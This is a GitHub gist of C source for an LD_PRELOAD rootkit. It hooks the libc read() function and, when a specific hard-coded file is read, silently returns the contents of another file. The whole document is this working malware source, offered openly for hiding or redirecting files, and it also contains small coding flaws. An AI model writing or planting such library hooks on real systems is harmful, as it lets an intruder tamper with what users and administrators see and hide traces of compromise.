Last active
October 11, 2023 12:50
-
-
Save LevitatingBusinessMan/1058ca397ad3619a0268a3f52f3a7693 to your computer and use it in GitHub Desktop.
LD_PRELOAD rootkit for hiding or redirecting files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <dlfcn.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| int new_fds[50][2] = {{0,0}}; | |
| //int new_fd = 0; | |
| ssize_t read(int fildes, void *buf, size_t nbyte) { | |
| ssize_t (*old_read)(int, void*, size_t); | |
| old_read = dlsym(RTLD_NEXT, "read"); | |
| ssize_t result; | |
| result = old_read(fildes, buf, nbyte); | |
| char path[30]; | |
| char filename[300]; | |
| int length; | |
| sprintf(path, "/proc/self/fd/%d", fildes); | |
| if ((length = readlink(path, filename, 300)) < 0) { | |
| return -1; | |
| } | |
| filename[length] = '\0'; | |
| int new_fd = 0; | |
| for(int i = 0; i<50 ;i++) { | |
| if (new_fds[i][0] == fildes) { | |
| new_fd = new_fds[i][1]; | |
| break; | |
| } | |
| } | |
| if (strcmp(filename, "/home/rein/hidden") == 0) { | |
| if (new_fd == 0) { | |
| new_fd = open("/tmp/hi",O_RDONLY); | |
| push(fildes, new_fd); | |
| } | |
| result = old_read(new_fd, buf, nbyte); | |
| } | |
| return result; | |
| } | |
| int push(int old_fd, int new_fd) { | |
| for(int i = 0; i<50 ;i++) { | |
| if (new_fds[i][0] == 0) { | |
| new_fds[i][0] = old_fd; | |
| new_fds[i][1] = new_fd; | |
| return i; | |
| } | |
| } | |
| return -1; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment